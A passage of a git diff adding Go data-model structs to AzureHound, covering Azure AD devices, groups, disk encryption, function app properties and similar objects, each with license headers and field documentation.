DisplayName string `json:"displayName,omitempty"` + + // Contains extension attributes 1-15 for the device. + // The individual extension attributes are not selectable. + // These properties are mastered in cloud and can be set during creation or update of a device object in Azure AD. + // Supports $filter (eq, NOT, startsWith). + ExtensionAttributes OnPremisesExtensionAttributes `json:"onPremisesExtensionAttributes,omitempty"` + + // true if the device complies with Mobile Device Management (MDM) policies; otherwise, false. + // Read-only. + // This can only be updated by Intune for any device OS type or by an approved MDM app for Windows OS devices. + // Supports $filter (eq, ne, NOT). + IsCompliant bool `json:"isCompliant,omitempty"` + + // true if the device is managed by a Mobile Device Management (MDM) app; otherwise, false. + // This can only be updated by Intune for any device OS type or by an approved MDM app for Windows OS devices. + // Supports $filter (eq, ne, NOT). + IsManaged bool `json:"isManaged,omitempty"` + + // Manufacturer of the device. + // Read-only. + Manufacturer string `json:"manufacturer,omitempty"` + + // Application identifier used to register device into MDM. + // Read-only. + // Supports $filter (eq, ne, NOT, startsWith). + MdmAppId string `json:"mdmAppId,omitempty"` + + // Model of the device. + // Read-only. + Model string `json:"model,omitempty"` + + // The last time at which the object was synced with the on-premises directory. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z Read-only. + // Supports $filter (eq, ne, NOT, ge, le, in). + OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"` + + // true if this object is synced from an on-premises directory; false if this object was originally synced from an + // on-premises directory but is no longer synced; null if this object has never been synced from an on-premises + // directory (default). + // Read-only. + // Supports $filter (eq, ne, NOT, in). + OnPremisesSyncEnabled bool `json:"onPremisesSyncEnabled,omitempty"` + + // The type of operating system on the device. + // Required. + // Supports $filter (eq, ne, NOT, ge, le, startsWith). + OperatingSystem string `json:"operatingSystem,omitempty"` + + // The version of the operating system on the device. + // Required. + // Supports $filter (eq, ne, NOT, ge, le, startsWith). + OperatingSystemVersion string `json:"operatingSystemVersion,omitempty"` + + // For internal use only. + // Not nullable. + // Supports $filter (eq, NOT, ge, le, startsWith). + PhysicalIds []string `json:"physicalIds,omitempty"` + + // The profile type of the device. + ProfileType enums.DeviceProfile `json:"profileType,omitempty"` + + // List of labels applied to the device by the system. + SystemLabels []string `json:"systemLabels,omitempty"` + + // Type of trust for the joined device. + // Read-only. + TrustType enums.TrustType `json:"trustType,omitempty"` +} diff --git a/models/azure/diagnostics_profile.go b/models/azure/diagnostics_profile.go new file mode 100644 index 0000000..4dcd781 --- /dev/null +++ b/models/azure/diagnostics_profile.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the boot diagnostic settings state. +// Minimum api-version: 2015-06-15. +type DiagnosticsProfile struct { + // Boot Diagnostics is a debugging feature which allows you to view Console Output and Screenshot to diagnose VM + // status. You can easily view the output of your console log. Azure also enables you to see a screenshot of the VM + // from the hypervisor. + BootDiagnotics BootDiagnotics `json:"bootDiagnotics,omitempty"` +} diff --git a/models/azure/diff_disk_settings.go b/models/azure/diff_disk_settings.go new file mode 100644 index 0000000..d1f7e5c --- /dev/null +++ b/models/azure/diff_disk_settings.go @@ -0,0 +1,36 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes the parameters of ephemeral disk settings that can be specified for operating system disk. +// NOTE: The ephemeral disk settings can only be specified for managed disk. +type DiffDiskSettings struct { + // Specifies the ephemeral disk settings for operating system disk. + Option string `json:"option,omitempty"` + + // Specifies the ephemeral disk placement for operating system disk. + // Possible values are: + // - CacheDisk + // - ResourceDisk + // + // Default: CacheDisk if one is configured for the VM size otherwise ResourceDisk is used. + // Refer to VM size documentation for Windows VM at https://docs.microsoft.com/azure/virtual-machines/windows/sizes + // and Linux VM at https://docs.microsoft.com/azure/virtual-machines/linux/sizes to check which VM sizes exposes a + // cache disk. + Placement string `json:"placement,omitempty"` +} diff --git a/models/azure/directory_object.go b/models/azure/directory_object.go new file mode 100644 index 0000000..149b62e --- /dev/null +++ b/models/azure/directory_object.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents an Azure Active Directory object. The directoryObject type is the base type for many other directory entity types. +type DirectoryObject struct { + // The unique identifier for the object. + // Note: The value is often but not exclusively a GUID (UUID v4 variant 2) + // + // Key + // Read-only + // Supports `filter` (eq,ne,NOT,in) + Id string `json:"id"` + + Type string `json:"@odata.type,omitempty"` +} diff --git a/models/azure/disk_encryption_set_params.go b/models/azure/disk_encryption_set_params.go new file mode 100644 index 0000000..90f7368 --- /dev/null +++ b/models/azure/disk_encryption_set_params.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes the parameter of customer managed disk encryption set resource id that can be specified for disk. +// NOTE: The disk encryption set resource id can only be specified for managed disk. +// Please refer https://aka.ms/mdssewithcmkoverview for more details. +type DiskEncryptionSetParameters struct { + // Resource ID. + Id string `json:"id,omitempty"` +} diff --git a/models/azure/disk_encryption_settings.go b/models/azure/disk_encryption_settings.go new file mode 100644 index 0000000..9a2f627 --- /dev/null +++ b/models/azure/disk_encryption_settings.go @@ -0,0 +1,30 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes an encryption setting for a disk +type DiskEncryptionSettings struct { + // Specifies the location of the disk encryption key, which is a Key Vault Secret. + DiskEncryptionKey KeyVaultSecretReference `json:"diskEncryptionKey,omitempty"` + + // Specifies whether disk encryption should be enabled on the virtual machine. + Enabled bool `json:"enabled,omitempty"` + + // Specifies the location of the key encryption key in Key Vault. + KeyEncryptionKey KeyVaultKeyReference `json:"keyEncryptionKey,omitempty"` +} diff --git a/models/azure/disk_instance_view.go b/models/azure/disk_instance_view.go new file mode 100644 index 0000000..400bd75 --- /dev/null +++ b/models/azure/disk_instance_view.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The instance view of the disk. +type DiskInstanceView struct { + // Specifies the encryption settings for the OS Disk. + // Minimum api-version: 2015-06-15 + EncryptionSettings []DiskEncryptionSettings `json:"encryptionSettings,omitempty"` + + // The disk name. + Name string `json:"name,omitempty"` + + // The resource status information. + Statuses []InstanceViewStatus `json:"statuses,omitempty"` +} diff --git a/models/azure/employee_org_data.go b/models/azure/employee_org_data.go new file mode 100644 index 0000000..97bf5de --- /dev/null +++ b/models/azure/employee_org_data.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Represents organization data associated with a user. +type EmployeeOrgData struct { + // The name of the division in which the user works. + // + // Returned only on `$select` + // Supports `$filter` + Division string `json:"division,omitempty"` + + // The cost center assoicated with the user. + // + // Returned only on `$select` + // Supports `$filter` + CostCenter string `json:"costCenter,omitempty"` +} diff --git a/models/azure/encryption_properties.go b/models/azure/encryption_properties.go new file mode 100644 index 0000000..26b2ca8 --- /dev/null +++ b/models/azure/encryption_properties.go @@ -0,0 +1,61 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type AutomationAccountEncryptionProperties struct { + Identity ManagedIdentity `json:"identity,omitempty"` + KeySource enums.EncryptionKeySourceType `json:"keySource,omitempty"` + KeyVaultProperties KeyVaultProperties `json:"keyVaultProperties,omitempty"` +} + +type StorageAccountEncryptionProperties struct { + Identity StorageAccountEncryptionIdentity `json:"identity,omitempty"` + KeySource enums.EncryptionKeySourceType `json:"keySource,omitempty"` + Keyvaultproperties KeyVaultProperties `json:"keyvaultproperties,omitempty"` + RequireInfrastructureEncryption bool `json:"requireInfrastructureEncryption,omitempty"` + Services EncryptionServices `json:"services,omitempty"` +} + +type KeyVaultProperties struct { + CurrentVersionedKeyExpirationTimestamp string `json:"currentVersionedKeyExpirationTimestamp,omitempty"` + CurrentVersionedKeyIdentifier string `json:"currentVersionedKeyIdentifier,omitempty"` + KeyName string `json:"keyName,omitempty"` + KeyVersion string `json:"keyVersion,omitempty"` + KeyvaultUri string `json:"keyvaultUri,omitempty"` + LastKeyRotationTimestamp string `json:"lastKeyRotationTimestamp,omitempty"` +} + +type StorageAccountEncryptionIdentity struct { + FederatedIdentityClientId string `json:"federatedIdentityClientId,omitempty"` + UserAssignedIdentity string `json:"userAssignedIdentity,omitempty"` +} + +type EncryptionServices struct { + Blob EncryptionService `json:"blob,omitempty"` + File EncryptionService `json:"file,omitempty"` + Queue EncryptionService `json:"queue,omitempty"` + Table EncryptionService `json:"table,omitempty"` +} + +type EncryptionService struct { + Enabled bool `json:"enabled,omitempty"` + KeyType enums.EncryptionKeyType `json:"keyType,omitempty"` + LastEnabledTime string `json:"lastEnabledTime,omitempty"` +} diff --git a/models/azure/entity.go b/models/azure/entity.go new file mode 100644 index 0000000..2c25565 --- /dev/null +++ b/models/azure/entity.go @@ -0,0 +1,22 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type Entity struct { + Id string `json:"id"` +} diff --git a/models/azure/extended_location.go b/models/azure/extended_location.go new file mode 100644 index 0000000..76e94bc --- /dev/null +++ b/models/azure/extended_location.go @@ -0,0 +1,23 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type ExtendedLocation struct { + Name string `json:"name,omitempty"` + Type string `json:"type,omitempty"` +} diff --git a/models/azure/function_app.go b/models/azure/function_app.go new file mode 100644 index 0000000..ab1fc51 --- /dev/null +++ b/models/azure/function_app.go @@ -0,0 +1,51 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +type FunctionApp struct { + Entity + + ExtendedLocation ExtendedLocation `json:"extendedLocation,omitempty"` + Identity ManagedIdentity `json:"identity,omitempty"` + Kind string `json:"kind,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Properties FunctionAppProperties `json:"properties,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s FunctionApp) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s FunctionApp) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/function_app_props.go b/models/azure/function_app_props.go new file mode 100644 index 0000000..1aa342c --- /dev/null +++ b/models/azure/function_app_props.go @@ -0,0 +1,84 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type FunctionAppProperties struct { + AvailabilityState enums.SiteAvailabilityState `json:"availabilityState,omitempty"` + ClientAffinityEnabled bool `json:"clientAffinityEnabled,omitempty"` + ClientCertEnabled bool `json:"clientCertEnabled,omitempty"` + ClientCertExclusionPaths string `json:"clientCertExclusionPaths,omitempty"` + ClientCertMode enums.ClientCertMode `json:"clientCertMode,omitempty"` + CloningInfo CloningInfo `json:"cloningInfo,omitempty"` + ContainerSize int `json:"containerSize,omitempty"` + CustomDomainVerificationId string `json:"customDomainVerificationId,omitempty"` + DailyMemoryTimeQuota int `json:"dailyMemoryTimeQuota,omitempty"` + DefaultHostName string `json:"defaultHostName,omitempty"` + Enabled bool `json:"enabled,omitempty"` + EnabledHostnames []string `json:"enabledHostnames,omitempty"` + HostingEnvironmentProfile HostingEnvironmentProfile `json:"hostingEnvironmentProfile,omitempty"` + Hostnames []string `json:"hostNames,omitempty"` + HostNamesDisabled bool `json:"hostNamesDisabled,omitempty"` + HostNameSslStates []HostNameSslState `json:"hostNameSslStates,omitempty"` + HttpsOnly bool `json:"httpsOnly,omitempty"` + HyperV bool `json:"hyperV,omitempty"` + InProgressOperationId string `json:"inProgressOperationId,omitempty"` + IsDefaultContainer bool `json:"isDefaultContainer,omitempty"` + IsXenon bool `json:"isXenon,omitempty"` + KeyVaultReferenceIdentity string `json:"keyVaultReferenceIdentity,omitempty"` + LastModifiedTimeUTC string `json:"lastModifiedTimeUtc,omitempty"` + MaxNumberOfWorkers int `json:"maxNumberOfWorkers,omitempty"` + OutboundIpAddresses string `json:"outboundIpAddresses,omitempty"` + PossibleOutboundIpAddresses string `json:"possibleOutboundIpAddresses,omitempty"` + PublicNetworkAccess string `json:"publicNetworkAccess,omitempty"` + RedundancyMode enums.RedundancyMode `json:"redundancyMode,omitempty"` + RepositorySiteName string `json:"repositorySiteName,omitempty"` + Reserved bool `json:"reserved,omitempty"` + ResourceGroup string `json:"resourceGroup,omitempty"` + ScmSiteAlsoStopped bool `json:"scmSiteAlsoStopped,omitempty"` + ServerFarmId string `json:"serverFarmId,omitempty"` + SiteConfig SiteConfig `json:"siteConfig,omitempty"` + SlotSwapStatus SlotSwapStatus `json:",omitempty"` + State string `json:"state,omitempty"` + StorageAccountRequired bool `json:"storageAccountRequired,omitempty"` + SuspendedTill string `json:"suspendedTill,omitempty"` + TargetSwapSlot string `json:"targetSwapSlot,omitempty"` + TrafficManagerHostNames []string `json:"trafficManagerHostNames,omitempty"` + UsageState enums.UsageState `json:"usageState,omitempty"` + VirtualNetworkSubnetId string `json:"virtualNetworkSubnetId,omitempty"` + VnetContentShareEnabled bool `json:"vnetContentShareEnabled,omitempty"` + VnetImagePullEnabled bool `json:"vnetImagePullEnabled,omitempty"` + VnetRouteAllEnabled bool `json:"vnetRouteAllEnabled,omitempty"` + + // Following elements have been found in testing within the returned object, but not present in the official documentation + AdminEnabled bool `json:"adminEnabled,omitempty"` + ComputeMode string `json:"computeMode,omitempty"` + ContainerAllocationSubnet string `json:"containerAllocationSubnet,omitempty"` + ContentAvailabilityState string `json:"contentAvailabilityState,omitempty"` + FtpsHostName string `json:"ftpsHostName,omitempty"` + FtpUsername string `json:"ftpUsername,omitempty"` + InboundIPAddress string `json:"inboundIpAddress,omitempty"` + Kind string `json:"kind,omitempty"` + Name string `json:"name,omitempty"` + PossibleInboundIpAddresses string `json:"possibleInboundIpAddresses,omitempty"` + PrivateEndpointConnections string `json:"privateEndpointConnections,omitempty"` + RuntimeAvailabilityState string `json:"runtimeAvailabilityState,omitempty"` + SelfLink string `json:"selfLink,omitempty"` + StorageRecoveryDefaultState string `json:"storageRecoveryDefaultState,omitempty"` +} diff --git a/models/azure/geo_replication_stats.go b/models/azure/geo_replication_stats.go new file mode 100644 index 0000000..3f47fa4 --- /dev/null +++ b/models/azure/geo_replication_stats.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type GeoReplicationStats struct { + CanFailover bool `json:"canFailover,omitempty"` + LastSyncTime string `json:"lastSyncTime,omitempty"` + Status enums.GeoReplicationStatus `json:"status,omitempty"` +} diff --git a/models/azure/group.go b/models/azure/group.go new file mode 100644 index 0000000..de58049 --- /dev/null +++ b/models/azure/group.go @@ -0,0 +1,281 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Represents an Azure Active Directory (Azure AD) group, which can be a Microsoft 365 group, or a security group. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/group?view=graph-rest-1.0 +type Group struct { + DirectoryObject + + // Indicates if people external to the organization can send messages to the group. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + AllowExternalSenders bool `json:"allowExternalSenders,omitempty"` + + // The list of sensitivity label pairs (label ID, label name) associated with a Microsoft 365 group. + // Returned only on $select. + // Read-only. + AssignedLabels []AssignedLabel `json:"assignedLabels,omitempty"` + + // The licenses that are assigned to the group. + // Returned only on $select. + // Supports $filter (eq) + // Read-only. + AssignedLicenses []AssignedLicense `json:"assignedLicenses,omitempty"` + + // Indicates if new members added to the group will be auto-subscribed to receive email notifications. + // You can set this property in a PATCH request for the group; do not set it in the initial POST request that + // creates the group. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + AutoSubscribeNewMembers bool `json:"autoSubscribeNewMembers,omitempty"` + + // Describes a classification for the group (such as low, medium or high business impact). + // Valid values for this property are defined by creating a ClassificationList setting value, based on the template + // definition. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, startsWith) + Classification string `json:"classification,omitempty"` + + // Timestamp of when the group was created. + // The value cannot be modified and is automatically populated when the group is created. The Timestamp type + // represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in). + // Read-only. + CreatedDateTime string `json:"createdDateTime,omitempty"` + + // For some Azure Active Directory objects (user, group, application), if the object is deleted, it is first + // logically deleted, and this property is updated with the date and time when the object was deleted. Otherwise, + // this property is null. If the object is restored, this property is updated to null. + DeletedDateTime string `json:"deletedDateTime,omitempty"` + + // An optional description for the group. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, startsWith) and $search. + Description string `json:"description,omitempty"` + + // The display name for the group. + // This property is required when a group is created and cannot be cleared during updates. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy. + DisplayName string `json:"displayName,omitempty"` + + // Timestamp of when the group is set to expire. The value cannot be modified and is automatically populated when + // the group is created. The Timestamp type represents date and time information using ISO 8601 format and is always + // in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in). + // Read-only. + ExpirationDateTime string `json:"expirationDateTime,omitempty"` + + // Specifies the group type and its membership. + // If the collection contains Unified, the group is a Microsoft 365 group; otherwise, it's either a security group + // or distribution group. For details, see groups overview. + // If the collection includes DynamicMembership, the group has dynamic membership; otherwise, membership is static. + // Returned by default. + // Supports $filter (eq, NOT). + GroupTypes []string `json:"groupTypes,omitempty"` + + // Indicates whether there are members in this group that have license errors from its group-based license + // assignment. + // This property is never returned on a GET operation. + // You can use it as a $filter argument to get groups that have members with license errors (that is, filter for + // this property being true) + // Supports $filter (eq). + HasMembersWithLicenseErrors bool `json:"hasMembersWithLicenseErrors,omitempty"` + + // True if the group is not displayed in certain parts of the Outlook UI: the Address Book, address lists for + // selecting message recipients, and the Browse Groups dialog for searching groups; otherwise, false. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + HideFromAddressLists bool `json:"hideFromAddressLists,omitempty"` + + // True if the group is not displayed in Outlook clients, such as Outlook for Windows and Outlook on the web; + // otherwise, false. + // Default value is false. + // Returned only on $select for GET /groups/{ID} + HideFromOutlookClients bool `json:"hideFromOutlookClients,omitempty"` + + // Indicates whether this group can be assigned to an Azure Active Directory role or not. + // Optional. + // This property can only be set while creating the group and is immutable. If set to true, the securityEnabled + // property must also be set to true and the group cannot be a dynamic group (that is, groupTypes cannot contain + // DynamicMembership). Only callers in Global administrator and Privileged role administrator roles can set this + // property. The caller must be assigned the RoleManagement.ReadWrite.Directory permission to set this property or + // update the membership of such groups. For more, see Using a group to manage Azure AD role assignments + // Returned by default. + // Supports $filter (eq, ne, NOT). + IsAssignableToRole bool `json:"isAssignableToRole,omitempty"` + + // Indicates whether the signed-in user is subscribed to receive email conversations. + // Default value is true. + // Returned only on $select for GET /groups/{ID} + IsSubscribedByMail bool `json:"isSubscribedByMail,omitempty"` + + // Indicates status of the group license assignment to all members of the group. + // Default value is false. + // Read-only. + // Returned only on $select. + LicenseProcessingState enums.LicenseProcessingState `json:"licenseProcessingState,omitempty"` + + // The SMTP address for the group, for example, "serviceadmins@contoso.onmicrosoft.com". + // Returned by default. + // Read-only. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + Mail string `json:"mail,omitempty"` + + // Specifies whether the group is mail-enabled. + // Required. + // Returned by default. + // Supports $filter (eq, ne, NOT). + MailEnabled bool `json:"mailEnabled,omitempty"` + + // The mail alias for the group, unique in the organization. + // Maximum length is 64 characters. + // This property can contain only characters in the ASCII character set 0 - 127 except: @ () \ [] " ; : . <> , SPACE + // Required. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + MailNickname string `json:"mailNickname,omitempty"` + + // The rule that determines members for this group if the group is a dynamic group (groupTypes contains + // DynamicMembership). For more information about the syntax of the membership rule, see Membership Rules syntax. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, startsWith). + MembershipRule string `json:"membershipRule,omitempty"` + + // Indicates whether the dynamic membership processing is on or paused. + // Returned by default. + // Supports $filter (eq, ne, NOT, in). + MembershipRuleProcessingState enums.RuleProcessingState `json:"membershipRuleProcessingState,omitempty"` + + // Indicates the last time at which the group was synced with the on-premises directory. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Read-only. + // Supports $filter (eq, ne, NOT, ge, le, in). + OnPremisesLastSyncDateTime string `json:"onPremisesLastSyncDateTime,omitempty"` + + // Errors when using Microsoft synchronization product during provisioning. + // Returned by default. + // Supports $filter (eq, NOT). + OnPremisesProvisioningErrors []OnPremisesProvisioningError `json:"onPremisesProvisioningErrors,omitempty"` + + // Contains the on-premises SAM account name synchronized from the on-premises directory. + // The property is only populated for customers who are synchronizing their on-premises directory to Azure Active + // Directory via Azure AD Connect. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + // Read-only. + OnPremisesSamAccountName string `json:"onPremisesSamAccountName,omitempty"` + + // Contains the on-premises security identifier (SID) for the group that was synchronized from on-premises to the + // cloud. + // Returned by default. + // Supports $filter on null values. + // Read-only. + OnPremisesSecurityIdentifier string `json:"onPremisesSecurityIdentifier,omitempty"` + + // true if this group is synced from an on-premises directory; false if this group was originally synced from an + // on-premises directory but is no longer synced; null if this object has never been synced from an on-premises + // directory (default). + // Returned by default. + // Read-only. + // Supports $filter (eq, ne, NOT, in). + OnPremisesSyncEnabled bool `json:"onPremisesSyncEnabled,omitempty"` + + // The preferred data location for the Microsoft 365 group. + // By default, the group inherits the group creator's preferred data location. To set this property, the calling + // user must be assigned one of the following Azure AD roles: + // - Global Administrator + // - User Account Administrator + // - Directory Writer + // - Exchange Administrator + // - SharePoint Administrator + // + // Nullable. + // Returned by default. + PreferredDataLocation string `json:"preferredDataLocation,omitempty"` + + // The preferred language for a Microsoft 365 group. + // Should follow ISO 639-1 Code; for example en-US. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith). + PreferredLanguage string `json:"preferredLanguage,omitempty"` + + // Email addresses for the group that direct to the same group mailbox. + // For example: ["SMTP: bob@contoso.com", "smtp: bob@sales.contoso.com"]. + // The any operator is required to filter expressions on multi-valued properties. + // Returned by default. + // Read-only. + // Not nullable. + // Supports $filter (eq, NOT, ge, le, startsWith). + ProxyAddresses []string `json:"proxyAddresses,omitempty"` + + // Timestamp of when the group was last renewed. + // This cannot be modified directly and is only updated via the renew service action. + // The Timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. + // Returned by default. + // Supports $filter (eq, ne, NOT, ge, le, in). + // Read-only. + RenewedDateTime string `json:"renewedDateTime,omitempty"` + + // Specifies the group behaviors that can be set for a Microsoft 365 group during creation. + // This can be set only as part of creation (POST). + ResourceBehaviorOptions []enums.ResourceBehavior `json:"resourceBehaviorOptions,omitempty"` + + // Specifies the group resources that are provisioned as part of Microsoft 365 group creation, that are not normally + // part of default group creation. + ResourceProvisioningOptions []enums.ResourceProvisioning `json:"resourceProvisioningOptions,omitempty"` + + // Specifies whether the group is a security 